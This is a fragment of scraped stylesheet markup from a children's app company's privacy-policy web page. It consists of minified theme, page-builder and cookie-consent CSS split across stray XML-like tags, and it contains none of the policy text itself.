&lt;title&gt;Bimi Boo Privacy Policy - Bimi Boo&lt;/title&gt;&lt;style id="rocket-critical-css"&gt;ul{box-sizing:border-box}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}html,body{overflow-x:hidden}.bwp-header .wpbingoLogo img{width:100%!important;max-width:135px;height:60px;max-height:100%}.header-desktop .container{width:100%!important;max-width:1170px!important}.mc4wp-response{float:right;text-align:center;width:100%;max-width:585px}#subscription-form-wrapper{background:#fff;border:solid 2px #e6e6e6;display:inline-block;border-radius:30px;padding:4px 4px 4px 20px;width:100%;max-width:630px;float:right}#subscription-form-submit-button{background:#ff8c57;color:#fff;border:solid 2px #ff8c57;border-radius:30px;float:right;font-size:14px;font-weight:500;padding:9px 20px 5px;margin:0}.bwp-navigation ul&gt;li.level-0&gt;a{font-size:14px}.elementor-hidden-mobile{border-radius:15px!important}@media (max-width:1200px){.bwp-header.header-v6 .header-right{align-items:center!important;flex-direction:row!important}}@media (max-width:1024px){.footer-padding .footer-inner-02{padding:20px 0</t>
  </si>
  <si>
    <t>6px!important}}@media (max-width:768px){#subscription-form-wrapper{margin:auto}}header#bwp-header{position:fixed;overflow:hidden;width:100%;left:0;right:0;top:0;background:#fff}.wpbingo-menu-wrapper .bwp-navigation{float:right}@media (max-width:1024px) and (min-width:970px){body&gt;div.elementor:nth-child(2){padding-top:60px}}@media (max-width:970px){body&gt;div.elementor:nth-child(2){padding-top:40px}}@media (max-width:767px){.footer-inner-txt{width:100%!important}.footer-inner-02{text-align:center!important}.footer-padding{margin-top:50px!important;padding:0!important}#bwp-footer{padding-bottom:0}}@media only screen and (min-width:990px) and (max-width:1200px){.header-desktop .container{padding:0 18px}}@media only screen and (min-width:1200px) and (max-width:1280px){.header-desktop .container{padding:0 40px}.header-left,.header-right{padding:0 15px}}@media only screen and (min-width:1280px) and (max-width:1500px){.header-desktop .container{max-width:1280px!important}}@media only screen and (min-width:1501px) and (max-width:1600px){.header-desktop .container{max-width:1200px!important}}@media only screen and (min-width:768px) and (max-width:1170px){.header-left,.header-right{padding:0 18px!important}}#bwp-footer{margin-top:0}.bwp-header .wpbingoLogo{padding-bottom:0}input:-internal-autofill-selected{appearance:menulist-button;background-image:none!important;background-color:transparent!important}.moove-gdpr-info-bar-container{padding:0!important}.moove-gdpr-cookie-notice p{color:#000!important;font-family:inter,Sans-serif!important;font-size:16px!important;line-height:22px!important;font-weight:500!important}aside#moove_gdpr_cookie_info_bar{padding:20px!important;border-radius:15px;margin:0 0 0</t>
  </si>
  <si>
    <t>50px!important;right:30px!important;max-height:100%!important;overflow:hidden!important;left:unset!important;background-color:rgba(252,233,104,.9)!important;width:100%!important;max-width:385px!important;top:unset!important;bottom:50px;border-top:0!important;color:#000!important}.moove-gdpr-button-holder button{background:#fff!important;color:#000!important;border:2px solid #fff!important;text-transform:uppercase!important;font-weight:700!important;font-size:14px!important;font-family:inter,Sans-serif!important;padding:8px 27px!important;margin:0!important}.moove-gdpr-info-bar-content{flex-direction:column;align-items:flex-start!important;padding:0!important}.moove-gdpr-button-holder{padding:10px 0 0!important}#bwp-header{z-index:9999}.subscription-form{background:#fff;border:solid 2px #e6e6e6;display:inline-block;border-radius:30px;padding:4px 4px 4px 30px;width:100%;max-width:630px;float:right}input:-internal-autofill-selected{background:0 0!important;background-color:transparent!important}#bwp-footer ul li:nth-child(3){display:none}@media only screen and (min-width:100px) and (max-width:768px){aside#moove_gdpr_cookie_info_bar{right:18px!important;left:18px!important;margin:0 auto!important;width:auto!important}.bwp-header .header-mobile .wpbingoLogo{padding-bottom:0}#bwp-footer{padding-bottom:0;margin-top:0!important}.bwp-header .wpbingoLogo img{width:100%!important;max-width:125px;height:40px;max-height:100%}.header-left,.header-right{padding:0 15px!important}#bwp-footer{padding-bottom:30px!important}.bwp-header .header-mobile{padding:10px 0}#bwp-footer .list-link-copyright ul li{margin:0 5px!important}#bwp-footer .list-link-copyright ul{margin:0 10px!important}}@media only screen and (min-width:100px) and (max-width:812px) and (orientation:landscape){#bwp-footer{padding-bottom:0!important}#bwp-footer .list-link-copyright ul{margin:0;max-width:100%}.bwp-header .header-mobile{padding:15px 0}}@media only screen and (min-width:991px) and (max-width:1080px){.bwp-header .header-normal{padding:0}.wpbingo-menu-wrapper{text-align:right}}@media only screen and (min-width:768px) and (max-width:1024px){#bwp-footer{padding-bottom:0!important}#subscription-form-wrapper{max-width:100%;margin-top:-10px}.bwp-header .wpbingoLogo</t>
  </si>
  <si>
    <t>img{width:110px!important;height:auto}#bwp-footer{padding-bottom:0;margin-top:0!important}#bwp-footer .list-link-copyright ul{max-width:100%}.SubscribeHome02{margin-top:0!important}.SubscribeHome02 .elementor-widget-container{margin:0!important}.SubscribeHome{margin-top:25px!important}}@media only screen and (min-width:320px) and (max-width:1024px) and (orientation:landscape){#subscription-form-wrapper{max-width:680px}.SubscribeHome02{margin-top:0!important}.SubscribeHome02 .elementor-widget-container{margin:0!important}.SubscribeHome02 .elementor-widget-container{margin:0!important}.bwp-header .wpbingoLogo{padding-bottom:0}}@media only screen and (min-width:375px) and (max-width:812px) and (orientation:landscape){#subscription-form-wrapper{margin-top:-10px}}@media only screen and (min-width:375px) and (max-width:667px) and (orientation:landscape){#subscription-form-submit-button{padding:3px 20px 4px;margin:0}}@media only screen and (min-width:768px) and (max-width:1024px) and (orientation:landscape){.SubscribeHome02{margin-top:0!important}.SubscribeHome02 .elementor-widget-container{margin:0!important}#subscription-form-wrapper{max-width:880px;margin-top:-10px}}@media only screen and (min-width:1024px) and (max-width:1366px) and (orientation:landscape){.SubscribeHome02 .elementor-widget-container{margin:0!important}}#subscription-form-wrapper #subscription-form-input{padding:12px 0;font-size:14px;font-weight:400;line-height:14px;max-width:465px;border: none;width:calc(100% - 123px)}#subscription-form-wrapper #subscription-form-submit-button{background:#ff8c57;color:#fff;border:solid 2px #ff8c57;border-radius:30px;float:right;font-size:14px;font-weight:500;padding:8px 20px 7px;margin:0}@media (max-width:1024px){#subscription-form-wrapper #subscription-form-input{padding:7px 0;font-size:11px;line-height:14px}#subscription-form-wrapper #subscription-form-submit-button{font-size:11px;padding:7px 12px;line-height:normal}}.form-section-title h3{margin-top:0;margin-bottom:0}.form-section-title{margin-bottom:5px!important}@media (max-width:567px){.form-section-title{margin-bottom:10px!important}}@media (max-width:769px){.footer-inner-txt .elementor-widget-container{margin:0!important}}body .bwp-header .header-normal{padding:0}*,:after,:before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-ms-overflow-style:scrollbar}@-ms-viewport{width:device-width}aside,header,nav,section{display:block}body{margin:0;font-family:Poppins,sans-serif;font-size:.865rem;font-weight:400;line-height:1.9;color:#868686;text-align:left;background-color:transparent}h1,h3{margin-top:1.5em;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}ul{margin-bottom:1rem}ul{margin-top:0}a{color:#000;text-decoration:none;background-color:transparent;-webkit-text-decoration-skip:objects}img{vertical-align:middle;border-style:none}svg:not(:root){overflow:hidden}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button,input{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button{text-transform:none}[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox]{box-sizing:border-box;padding:0}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}h1,h3{margin-bottom:.5rem;font-family:Poppins,sans-serif;font-weight:700;line-height:1.2;color:#000}h1{font-size:2.1625rem}h3{font-size:1.51375rem}.container{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:576px){.container{max-width:540px}}@media (min-width:768px){.container{max-width:720px}}@media (min-width:992px){.container{max-width:960px}}@media (min-width:1200px){.container{max-width:1140px}}.row{display:flex;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.col-4,.col-6,.col-8,.col-lg-3,.col-lg-4,.col-lg-8,.col-lg-9,.col-md-4,.col-md-6,.col-md-8,.col-sm-4,.col-sm-6,.col-sm-8,.col-xl-3,.col-xl-4,.col-xl-8,.col-xl-9{position:relative;width:100%;min-height:1px;padding-right:15px;padding-left:15px}.col-4{flex:0 0</t>
  </si>
  <si>
    <t>33.33333%;max-width:33.33333%}.col-6{flex:0 0 50%;max-width:50%}.col-8{flex:0 0 66.66667%;max-width:66.66667%}@media (min-width:576px){.col-sm-4{flex:0 0 33.33333%;max-width:33.33333%}.col-sm-6{flex:0 0 50%;max-width:50%}.col-sm-8{flex:0 0 66.66667%;max-width:66.66667%}}@media (min-width:768px){.col-md-4{flex:0 0 33.33333%;max-width:33.33333%}.col-md-6{flex:0 0 50%;max-width:50%}.col-md-8{flex:0 0 66.66667%;max-width:66.66667%}}@media (min-width:992px){.col-lg-3{flex:0 0 25%;max-width:25%}.col-lg-4{flex:0 0 33.33333%;max-width:33.33333%}.col-lg-8{flex:0 0 66.66667%;max-width:66.66667%}.col-lg-9{flex:0 0 75%;max-width:75%}}@media (min-width:1200px){.col-xl-3{flex:0 0</t>
  </si>
  <si>
    <t>25%;max-width:25%}.col-xl-4{flex:0 0 33.33333%;max-width:33.33333%}.col-xl-8{flex:0 0 66.66667%;max-width:66.66667%}.col-xl-9{flex:0 0 75%;max-width:75%}}.clearfix:after{display:block;clear:both;content:""}@font-face{font-family:wpbingofont;src:url(https://bimiboo.net/wp-content/themes/kidsy/fonts/wpbingo.eot?fzv6fp);src:url(https://bimiboo.net/wp-content/themes/kidsy/fonts/wpbingo.eot?fzv6fp#iefix) format("embedded-opentype"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/wpbingo.ttf?fzv6fp) format("truetype"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/wpbingo.woff?fzv6fp) format("woff"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/wpbingo.svg?fzv6fp#wpbingo) format("svg");font-weight:400;font-style:normal;font-display:block}@font-face{font-family:icomoon;src:url(https://bimiboo.net/wp-content/themes/kidsy/fonts/icomoon.eot?fzv6fp);src:url(https://bimiboo.net/wp-content/themes/kidsy/fonts/icomoon.eot?fzv6fp#iefix) format("embedded-opentype"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/icomoon.ttf?fzv6fp) format("truetype"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/icomoon.woff?fzv6fp) format("woff"),url(https://bimiboo.net/wp-content/themes/kidsy/fonts/icomoon.svg?fzv6fp#icomoon) format("svg");font-weight:400;font-style:normal;font-display:block}[class*=" icon-"]{font-family:icomoon;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body:not(.page-template-homepage) .bwp-header .header-desktop,body:not(.page-template-homepage) .bwp-header .header-mobile{border-bottom:1px solid #e5e5e5}.bwp-header{margin-bottom:0;position:relative;z-index:9999;background:0 0}.bwp-header .header-left&gt;*{display:inline-block;vertical-align:middle}.bwp-header .wpbingoLogo{padding-bottom:7px}.bwp-header .header-right{position:relative;color:#8d8d8d;display:flex;align-items:center;justify-content:flex-end}.bwp-header .wpbingoLogo</t>
  </si>
  <si>
    <t>img{max-height:50px;width:auto}@media (max-width:480px){.bwp-header .wpbingoLogo{margin-bottom:15px;text-align:center}}@media (max-width:991px){.bwp-header .header-desktop{display:none}}@media (min-width:992px){.bwp-header .header-mobile{display:none}}.bwp-header .header-mobile{padding:20px 0}.bwp-header .header-mobile&gt;.container&gt;.row{align-items:center}.bwp-header .header-mobile .navbar-toggle{border:0;background:0 0;padding:0}.bwp-header .header-mobile .navbar-toggle:before{content:"\e908";font-family:wpbingofont;font-size:20px;color:#000}.bwp-header .header-mobile .navbar-toggle span{display:none}.bwp-header .header-mobile .wpbingoLogo{text-align:center;margin:0!important}.bwp-header .header-mobile .header-right{display:flex;justify-content:flex-end;align-items:center}.bwp-header .header-wrapper{position:relative}.bwp-header .header-wrapper .row{align-items:center}.bwp-header .header-normal{background:0 0!important}.bwp-header .header-normal{padding:30px 0}@media (max-width:991px){.bwp-header .header-normal .header-main{justify-content:flex-end!important}}.bwp-header .header-normal .menu{display:flex;flex-wrap:wrap}.bwp-header .header-normal .header-wrapper{background:0 0!important}.bwp-header .header-normal .header-wrapper .header-left{order:unset}.bwp-header .header-normal .header-wrapper .wpbingoLogo{margin-bottom:0;text-align:left}@media</t>
  </si>
  <si>
    <t>(max-width:991px){.bwp-header .header-normal .header-wrapper .wpbingoLogo{margin-bottom:0;text-align:left}}@media (max-width:480px){.bwp-header .header-normal .wpbingoLogo{margin-bottom:0;text-align:left}}.bwp-header.header-v6 .header-wrapper{padding:25px 0}@media (max-width:1200px){.bwp-header.header-v6 .header-right{align-items:flex-end;flex-direction:column}}h1:not(.elementor-heading-title){font-family:Poppins,sans-serif}img{border:0;vertical-align:top;max-width:100%;height:auto}a{color:#000}ul{margin:0}#bwp-footer{background:0 0;padding-top:0;padding-bottom:0;position:relative;color:#868686;border-bottom:none;font-size:13px;z-index:2;line-height:24px;margin-top:60px}@media (max-width:991px){#bwp-footer{padding-bottom:43px}}#bwp-footer a{font-size:13px;color:#868686}#bwp-footer ul{list-style:none;padding:0}#bwp-footer ul li{margin-bottom:6px}#bwp-footer ul li:last-child{margin-bottom:0}#bwp-footer .list-link-copyright ul li{display:inline-block;margin-right:30px;margin-bottom:0;line-height:13px}#bwp-footer .list-link-copyright ul li a{color:#000;font-size:13px;font-weight:600}#bwp-footer .list-link-copyright ul li:last-child{margin-right:0}@media (max-width:767px){#bwp-footer .list-link-copyright ul{text-align:center}#bwp-footer .list-link-copyright ul li{margin:0 10px!important}}html{font-size:15px}input[type=email],input[type=text]{border:1px solid #ddd;padding:5px 6px;background:0 0;border-radius:0;-webkit-border-radius:0;-moz-border-radius:0;-ms-border-radius:0;-o-border-radius:0;box-shadow:none;-moz-appearance:none;-o-appearance:none;-webkit-appearance:none}label{font-weight:500}@media (max-width:991px){.bwp-navigation{display:none}}.wpbingo-menu-wrapper .navbar-default{border:none;background:0 0}.bwp-navigation{float:none}.bwp-navigation ul{padding:0;list-style:none;float:none;margin:0}.bwp-navigation ul li{text-align:left}.bwp-navigation ul&gt;li.level-0{position:relative;display:table;float:left;padding:0 20px;line-height:24px}.bwp-navigation ul&gt;li.level-0:last-child{padding-right:0}@media (max-width:1350px){.bwp-navigation ul&gt;li.level-0{padding:0 10px}}.bwp-navigation ul&gt;li.level-0&gt;a{position:relative;text-transform:uppercase;font-family:Poppins,sans-serif;font-weight:600;font-size:12px;background-color:transparent;color:#000;display:table;white-space:nowrap;letter-spacing:.05em}.bwp-navigation ul&gt;li.level-0&gt;a&gt;span{position:relative;display:inline-block}@media (min-width:992px){.container{max-width:100%}}@media (min-width:768px){.container{max-width:100%}}@media (min-width:576px){.container{max-width:100%}}@media (min-width:768px){.navbar-toggle{display:none}}.hide{display:none}@media (min-width:992px){.bwp-navigation{display:inline-block;vertical-align:top}}@media (max-width:991px){.navbar-toggle{display:block}}@media (max-width:1510px) and (min-width:1200px){.container{padding:0 50px}}.elementor-screen-only{position:absolute;top:-10000em;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.elementor{-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual}.elementor *,.elementor :after,.elementor :before{-webkit-box-sizing:border-box;box-sizing:border-box}.elementor a{-webkit-box-shadow:none;box-shadow:none;text-decoration:none}.elementor img{height:auto;max-width:100%;border:none;-webkit-border-radius:0;border-radius:0;-webkit-box-shadow:none;box-shadow:none}.elementor-widget-wrap .elementor-element.elementor-widget__width-auto{max-width:100%}.elementor-invisible{visibility:hidden}:root{--page-title-display:block}.elementor-section{position:relative}.elementor-section .elementor-container{display:-webkit-box;display:-ms-flexbox;display:flex;margin-right:auto;margin-left:auto;position:relative}@media (max-width:1024px){.elementor-section .elementor-container{-ms-flex-wrap:wrap;flex-wrap:wrap}}.elementor-section.elementor-section-boxed&gt;.elementor-container{max-width:1140px}.elementor-widget-wrap{position:relative;width:100%;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-line-pack:start;align-content:flex-start}.elementor:not(.elementor-bc-flex-widget) .elementor-widget-wrap{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-wrap&gt;.elementor-element{width:100%}.elementor-widget{position:relative}.elementor-widget:not(:last-child){margin-bottom:20px}.elementor-column{min-height:1px}.elementor-column{position:relative;display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-column-gap-default&gt;.elementor-column&gt;.elementor-element-populated{padding:10px}.elementor-column-gap-extended&gt;.elementor-column&gt;.elementor-element-populated{padding:15px}@media (min-width:576px){.elementor-column.elementor-col-33{width:33.333%}.elementor-column.elementor-col-50{width:50%}.elementor-column.elementor-col-100{width:100%}}@media (max-width:575px){.elementor-column{width:100%}}@media (max-width:1366px){#elementor-device-mode:after{content:"laptop"}}@media (max-width:1200px){#elementor-device-mode:after{content:"tablet_extra"}}@media (max-width:1024px){#elementor-device-mode:after{content:"tablet"}}@media (max-width:767px){#elementor-device-mode:after{content:"mobile_extra"}}@media (max-width:575px){#elementor-device-mode:after{content:"mobile"}}.animated{-webkit-animation-duration:1.25s;animation-duration:1.25s}@media (prefers-reduced-motion:reduce){.animated{-webkit-animation:none;animation:none}}@media (max-width:575px){.elementor .elementor-hidden-mobile{display:none}}@media (min-width:576px) and (max-width:767px){.elementor .elementor-hidden-mobile_extra{display:none}}@media (min-width:768px) and (max-width:1024px){.elementor .elementor-hidden-tablet{display:none}}@media (min-width:1025px) and (max-width:1200px){.elementor .elementor-hidden-tablet_extra{display:none}}@media (min-width:1201px) and (max-width:1366px){.elementor .elementor-hidden-laptop{display:none}}@media (min-width:1367px) and (max-width:2399px){.elementor .elementor-hidden-desktop{display:none}}.elementor-location-footer:before,.elementor-location-header:before{content:"";display:table;clear:both}@font-face{font-family:Nunito;src:url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.eot);src:url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.eot?#iefix) format("embedded-opentype"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.woff2) format("woff2"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.woff) format("woff"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.ttf) format("truetype"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-regular.svg#svgFontName) format("svg");font-style:normal;font-weight:400;font-display:swap}@font-face{font-family:Nunito;src:url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.eot);src:url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.eot?#iefix) format("embedded-opentype"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.woff2) format("woff2"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.woff) format("woff"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.ttf) format("truetype"),url(https://bimiboo.net/wp-content/plugins/gdpr-cookie-compliance/dist/fonts/nunito-v8-latin-700.svg#svgFontName) format("svg");font-style:normal;font-weight:700;font-display:swap}.gdpr_lightbox-hide{display:none}#moove_gdpr_cookie_info_bar .gdpr-fbo-0{-ms-flex-order:1;order:1}.gdpr-sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0}#moove_gdpr_cookie_modal li button .gdpr-svg-icon{height:30px;display:inline-block;float:left;width:35px;margin-right:5px;position:relative;top:0}#moove_gdpr_cookie_modal li button .gdpr-svg-icon svg{height:30px;width:auto;background-color:transparent}#moove_gdpr_cookie_info_bar{content-visibility:auto}#moove_gdpr_cookie_info_bar .moove-gdpr-button-holder{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider{overflow:visible}#moove_gdpr_cookie_modal{margin:0 auto;margin-top:0;min-height:60vh;font-family:Nunito,sans-serif;content-visibility: hidden}#moove_gdpr_cookie_modal span.tab-title{display:block}#moove_gdpr_cookie_modal button{letter-spacing:0;outline:none}#moove_gdpr_cookie_modal *{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:inherit}#moove_gdpr_cookie_modal .cookie-switch{position:relative;display:inline-block;width:50px;height:30px}#moove_gdpr_cookie_modal .cookie-switch input{display:none}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider{position:absolute;top:0;left:0;right:0;bottom:0;background-color:red;margin:0;padding:0}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider:before{position:absolute;content:"";height:26px;width:26px;left:1px;bottom:1px;border:1px solid #f2f2f2;border-radius:50%;background-color:#fff;box-shadow:0 5px 15px 0 rgba(0,0,0,.25);display:block;box-sizing:content-box}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider:after{content:attr(data-text-disabled);position:absolute;top:0;left:60px;font-weight:700;font-size:16px;line-height:30px;color:red;display:block;white-space:nowrap}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider.cookie-round{border-radius:34px}#moove_gdpr_cookie_modal .cookie-switch .cookie-slider.cookie-round:before{border-radius:50%}#moove_gdpr_cookie_modal a,#moove_gdpr_cookie_modal button{outline:none;box-shadow:none;text-shadow:none}#moove_gdpr_cookie_modal .moove-gdpr-modal-content{color:#000;background-color:#fff;width:900px;width:80vw;max-width:1170px;min-height:600px;border-radius:10px;position:relative;margin:0 auto}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .gdpr-cc-form-fieldset{background-color:transparent}#moove_gdpr_cookie_modal .moove-gdpr-modal-content.logo-position-left .moove-gdpr-company-logo-holder{text-align:left}#moove_gdpr_cookie_modal .moove-gdpr-modal</t>
  </si>
  <si>
    <t>-content.moove_gdpr_modal_theme_v1 .main-modal-content{display:-ms-flexbox;display:flex;-ms-flex-flow:column;flex-flow:column;height:100%}#moove_gdpr_cookie_modal .moove-gdpr-modal-content.moove_gdpr_modal_theme_v1 .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton{margin:2px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close{position:absolute;text-decoration:none;top:-30px;right:-30px;display:block;width:60px;height:60px;line-height:60px;text-align:center;border-radius:50%;background:0 0;padding:0;z-index:99;margin:0;outline:none;box-shadow:none;border:none}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon{display:block;width:60px;height:60px;line-height:60px;font-size:48px;background-color:#0c4da2;border:1px solid #0c4da2;color:#fff;border-radius:50%}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-company-logo-holder{padding:0;margin-bottom:30px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-company-logo-holder img{max-height:75px;max-width:70%;width:auto;display:inline-block}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main span.tab-title{font-weight:700;font-size:28px;line-height:1.2;margin:0;padding:0;color:#000;margin-bottom:25px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content{display:-ms-flexbox;display:flex;-ms-flex-flow:column;flex-flow:column;max-height:calc(100% - 155px);overflow-y: auto;padding-right:20px;padding-bottom:15px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content p{font-weight:400;font-size:16px;line-height:1.4;margin-bottom:18px;margin-top:0;padding:0;color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content a{color:#000;text-decoration:underline}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-status-bar{padding:5px;margin-right:10px;margin-bottom:15px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-status-bar .gdpr-cc-form-wrap,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-status-bar .gdpr-cc-form-wrap .gdpr-cc-form-fieldset{border:none;padding:0;margin:0;box-shadow:none}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;height:130px;position:absolute;left:0;bottom:0;width:100%;background-color:#f1f1f1;z-index:15;border-radius:5px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content:before{content:"";position:absolute;bottom:130px;left:60px;right:60px;height:1px;display:block;background-color:#c9c8c8}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder{width:calc(100% + 16px);display:-ms-flexbox;display:flex;padding:0 60px;-ms-flex-pack:justify;justify-content:space-between;margin:0 -2px;-ms-flex-wrap:wrap;flex-wrap:wrap}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton{margin:8px;text-decoration:none;border-radius:150px;color:#fff;padding:15px 10px;border:1px solid transparent;min-width:160px;text-align:center;text-transform:none;letter-spacing:0;font-weight:700;font-size:14px;line-height:20px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton.moove-gdpr-modal-save-settings{color:#fff;display:none}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content{width:40%;display:inline-block;float:left;padding:40px 60px;position:absolute;height:100%;top:0;box-shadow:0 0 30px 0 rgba(35,35,35,.1);background:#fff;z-index:10;left:0;border-top-left-radius:5px;border-bottom-left-radius:5px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content .moove-gdpr-branding-cnt{position:absolute;bottom:0;padding-bottom:30px;left:60px;right:60px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content .moove-gdpr-branding-cnt a{color:#000;font-weight:700;font-size:13px;letter-spacing:-.3px;padding:20px 0;position:relative;top:10px;text-decoration:none;display:block}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content .moove-gdpr-branding-cnt a span{display:inline-block;text-decoration:underline}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu{padding:0;list-style:none;margin:0;z-index:12}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li{margin:0;padding:0;list-style:none;margin-bottom:15px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button{background-color:#fff;border-color:#f1f1f1;color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items</t>
  </si>
  <si>
    <t>: center;font-weight:800;font-size:14px;text-decoration:none;text-transform:uppercase;background-color:#f1f1f1;border:1px solid #f1f1f1;line-height:1.1;padding:13px 20px;color:#0c4da2;width:100%;border-radius:5px;text-align:left}#moove_gdpr_cookie_modal .moove- gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button span.gdpr-nav-tab-title{display:-ms-inline-flexbox;display:inline-flex;-ms-flex-align:center;align-items:center;width:calc(100% - 40px)}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-right-content{width:60%;display:inline-block;float:right;padding:40px 60px;position:absolute;top:0;height:auto;right:0;background-color:#f1f1f1;border-top-right-radius:5px;border-bottom-right-radius:5px}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-status-bar:after,.moove-clearfix:after{content:"";display:table;clear:both}#moove_gdpr_cookie_info_bar{position:fixed;bottom:0;left:0;width:100%;min-height:60px;max-height:400px;color:#fff;z-index:9900;background-color:#202020;border-top:1px solid #fff;font-family:Nunito,sans-serif}#moove_gdpr_cookie_info_bar *{font-family:inherit;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#moove_gdpr_cookie_info_bar.moove-gdpr-info-bar-hidden{bottom:-400px}#moove_gdpr_cookie_info_bar.moove-gdpr-align-center{text-align:center}#moove_gdpr_cookie_info_bar.moove-gdpr-light-scheme{background-color:#fff;border-top:1px solid #202020}#moove_gdpr_cookie_info_bar.moove-gdpr-light-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content p,#moove_gdpr_cookie_info_bar.moove-gdpr-light-scheme p{color:#202020}#moove_gdpr_cookie_info_bar.moove-gdpr-light-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button{text-decoration:underline;outline:none}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container{padding:10px 40px;position:static;display:inline-block}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container 